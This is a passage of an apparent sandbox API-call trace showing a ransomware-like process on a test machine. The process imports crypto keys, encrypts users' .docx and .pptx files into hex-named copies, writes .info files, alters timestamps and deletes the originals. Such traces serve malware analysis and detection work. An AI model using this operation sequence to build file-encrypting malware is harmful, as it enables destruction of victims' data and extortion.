lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0072.421] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", lpFilePart=0x0) returned 0x3b [0072.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0072.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4rrbngpzmixp3k.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0072.421] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0072.421] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", lpFilePart=0x0) returned 0x3b [0072.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0072.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4rrbngpzmixp3k.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0072.422] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0072.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", lpFilePart=0x0) returned 0x3b [0072.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0072.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4rrbngpzmixp3k.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0072.422] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0072.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", lpFilePart=0x0) returned 0x3b [0072.422] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4rrbngpzmixp3k.pptx")) returned 1 [0072.436] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", lpFilePart=0x0) returned 0x3b [0072.436] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF", lpFilePart=0x0) returned 0x48 [0072.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0072.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6a9fae0d0394dbfdfc46f21b313726cf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0072.436] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0072.436] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF", lpFilePart=0x0) returned 0x48 [0072.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0072.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6a9fae0d0394dbfdfc46f21b313726cf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0072.436] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0072.437] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF", lpFilePart=0x0) returned 0x48 [0072.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0072.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6a9fae0d0394dbfdfc46f21b313726cf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0072.437] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0072.437] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", lpFilePart=0x0) returned 0x40 [0072.437] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", lpFilePart=0x0) returned 0x40 [0072.438] CryptImportKey (in: hProv=0x1a5b7e10, pbData=0x23c0558, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a626ad0) returned 1 [0072.438] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0072.438] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0072.438] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x23c0648, pdwDataLen=0x1bf5db30 | out: pbData=0x23c0648*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0072.438] CryptImportKey (in: hProv=0x1a5b7e10, pbData=0x23c0768, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626a60) returned 1 [0072.438] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0072.438] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0072.438] CryptDuplicateKey (in: hKey=0x1a626a60, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626fa0) returned 1 [0072.438] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0072.438] CryptSetKeyParam (hKey=0x1a626fa0, dwParam=0x4, pbData=0x23c08b0*=0x1, dwFlags=0x0) returned 1 [0072.438] CryptSetKeyParam (hKey=0x1a626fa0, dwParam=0x1, pbData=0x23c0860, dwFlags=0x0) returned 1 [0072.438] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0072.438] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0072.439] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", lpFilePart=0x0) returned 0x40 [0072.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0072.439] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cwunr5ccuqwnx-ag1l3.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.439] GetFileType (hFile=0x36c) returned 0x1 [0072.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0072.439] GetFileType (hFile=0x36c) returned 0x1 [0072.439] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49", lpFilePart=0x0) returned 0x48 [0072.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0072.439] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9f02d8718596e6125725aace739a4c49"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x380 [0072.439] GetFileType (hFile=0x380) returned 0x1 [0072.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0072.439] GetFileType (hFile=0x380) returned 0x1 [0072.440] ReadFile (in: hFile=0x36c, lpBuffer=0x23c0c90, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x23c0c90*, lpNumberOfBytesRead=0x1bf5da28*=0x14000, lpOverlapped=0x0) returned 1 [0072.442] CryptEncrypt (in: hKey=0x1a626fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23d4ca8*, pdwDataLen=0x1bf5da80*=0x14000, dwBufLen=0x14000 | out: pbData=0x23d4ca8*, pdwDataLen=0x1bf5da80*=0x14000) returned 1 [0072.443] WriteFile (in: hFile=0x380, lpBuffer=0x23d4ca8*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x23d4ca8*, lpNumberOfBytesWritten=0x1bf5da18*=0x14000, lpOverlapped=0x0) returned 1 [0072.445] ReadFile (in: hFile=0x36c, lpBuffer=0x23c0c90, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x23c0c90*, lpNumberOfBytesRead=0x1bf5da28*=0x4b64, lpOverlapped=0x0) returned 1 [0072.446] CryptEncrypt (in: hKey=0x1a626fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23e8ce8*, pdwDataLen=0x1bf5da80*=0x4b60, dwBufLen=0x4b60 | out: pbData=0x23e8ce8*, pdwDataLen=0x1bf5da80*=0x4b60) returned 1 [0072.446] WriteFile (in: hFile=0x380, lpBuffer=0x23e8ce8*, nNumberOfBytesToWrite=0x4b60, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x23e8ce8*, lpNumberOfBytesWritten=0x1bf5da18*=0x4b60, lpOverlapped=0x0) returned 1 [0072.446] ReadFile (in: hFile=0x36c, lpBuffer=0x23c0c90, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x23c0c90*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0072.446] CryptEncrypt (in: hKey=0x1a626fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23ed888*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x23ed888*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0072.446] CryptEncrypt (in: hKey=0x1a626fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23ed8d8*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x23ed8d8*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0072.447] WriteFile (in: hFile=0x380, lpBuffer=0x23ed928*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x23ed928*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0072.447] CloseHandle (hObject=0x380) returned 1 [0072.448] CloseHandle (hObject=0x36c) returned 1 [0072.448] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0072.448] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0072.448] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0072.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49", lpFilePart=0x0) returned 0x48 [0072.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0072.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9f02d8718596e6125725aace739a4c49"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.449] GetFileType (hFile=0x36c) returned 0x1 [0072.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0072.449] GetFileType (hFile=0x36c) returned 0x1 [0072.449] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.450] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.451] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.452] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.453] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.453] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.453] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.453] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.454] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.454] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.454] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.454] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.454] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.454] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.454] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.454] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.454] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.455] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.455] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.455] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.455] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.455] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.455] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.455] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.455] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0xb70, lpOverlapped=0x0) returned 1 [0072.455] ReadFile (in: hFile=0x36c, lpBuffer=0x23ef020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23ef020*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0072.456] CloseHandle (hObject=0x36c) returned 1 [0072.457] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49.info", lpFilePart=0x0) returned 0x4d [0072.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0072.458] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9f02d8718596e6125725aace739a4c49.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.458] GetFileType (hFile=0x36c) returned 0x1 [0072.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0072.458] GetFileType (hFile=0x36c) returned 0x1 [0072.459] WriteFile (in: hFile=0x36c, lpBuffer=0x23fb6c0*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x23fb6c0*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0072.460] CloseHandle (hObject=0x36c) returned 1 [0072.461] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", lpFilePart=0x0) returned 0x40 [0072.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0072.461] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cwunr5ccuqwnx-ag1l3.docx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef35eb30, ftCreationTime.dwHighDateTime=0x1d4f47b, ftLastAccessTime.dwLowDateTime=0x476d070, ftLastAccessTime.dwHighDateTime=0x1d4e8e4, ftLastWriteTime.dwLowDateTime=0x476d070, ftLastWriteTime.dwHighDateTime=0x1d4e8e4, nFileSizeHigh=0x0, nFileSizeLow=0x18b64)) returned 1 [0072.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0072.461] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", lpFilePart=0x0) returned 0x40 [0072.461] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", dwFileAttributes=0x80) returned 1 [0072.461] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", lpFilePart=0x0) returned 0x40 [0072.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0072.461] 